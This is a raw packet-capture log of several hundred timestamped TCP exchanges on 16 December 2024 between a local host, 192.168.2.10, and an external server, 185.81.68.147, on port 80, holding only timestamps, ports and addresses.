                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.699654102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.800596952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.800611019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.800622940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.800782919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.801536083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.801548004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.801559925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.801635981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.801657915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.803216934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.803229094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.803240061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.803319931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.804207087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.804219007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.804229975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.804322004 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.804816008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.805150986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.805164099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.805253029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.806704998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.806716919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.806727886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.806802988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.807852030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.807864904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.807946920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.807972908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.809319019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.809331894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.809343100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.809406996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.809418917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.810204029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.810235023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.810288906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.810870886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.811969995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.811981916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.811991930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.812057972 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.812067986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.812081099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.812097073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.812982082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.812994003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.813086033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.814599991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.814613104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.814624071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.814704895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.815597057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.815608978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.815619946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.815687895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.815968990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.816833019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.816845894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.816909075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.818100929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.818113089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.818124056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.818193913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.819082975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.819093943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.819104910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.819176912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.819199085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.820736885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.820749044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.820760012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.820842028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.821784973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.821796894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.821806908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.821877003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.821902037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.822907925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.822918892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.823000908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.824235916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.824246883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.824259043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.824326992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.825195074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.825206041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.825216055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.825269938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.825294018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.827094078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.827105999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.827116966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.827192068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828033924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828044891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828056097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828124046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828139067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828593969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.828802109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.829546928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.829622030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.829750061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.831237078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.831248999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.831273079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.831330061 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.831824064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.833045959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.833058119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.833070040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.833141088 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.834139109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.834150076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.834161997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.834240913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.834264994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.834847927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.835784912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.835797071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.835808992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.835860014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.835874081 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.837292910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.837305069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.837440968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.838309050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.838320971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.838331938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.838423014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.839272976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.839284897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.839294910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.839361906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.839381933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.840558052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.840570927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.840665102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.841772079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.841784954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.841795921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.841865063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.842770100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.842782974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.842794895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.842866898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.842880964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.843837023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.843851089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.843950987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.845287085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.845299006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.845309973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.845387936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.846858025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.846868992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.846946955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.993007898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.993026018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.993036985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.993124962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.993185997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.993215084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.994194984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.994210005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.994252920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.994627953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.994879961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.994906902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.996316910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.996328115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.996339083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.996361017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.996804953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.996834993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.998051882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.998069048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.998083115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.998117924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.999039888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.999052048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.999063969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.999088049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.999106884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.999830008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.000430107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.000473022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.001508951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.001519918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.001593113 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.001671076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.001682043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.001735926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.002561092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.002870083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.002931118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.003382921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.003518105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.003571987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.004475117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.004487991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.004551888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.005067110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.005371094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.005419970 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.005964994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.006128073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.006176949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.006824970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.007041931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.007091045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.007687092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.007818937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.007867098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.008742094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.008759975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.008847952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.009490013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.009578943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.009668112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.010354996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.010497093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.010549068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.011369944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.011383057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.011436939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.012128115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.012252092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.012350082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.013046026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.013073921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.013179064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.013899088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.014019012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.014081955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.014859915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.014872074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.015055895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.015713930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.015820980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.015877008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.016762972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.016774893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.016809940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.017390013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.017597914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.017628908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.018256903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.018328905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.018362045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.019172907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.019357920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.019423962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.020030975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.020159960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.020217896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.020957947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.021047115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.021085978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.021742105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.021847010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.021891117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.022682905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.022785902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.022828102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.023530960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.023627996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.023690939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.024432898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.024621010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.024663925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.025293112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.025399923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.025437117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.026334047 CET8049723185.81.68.147192.168.2.10
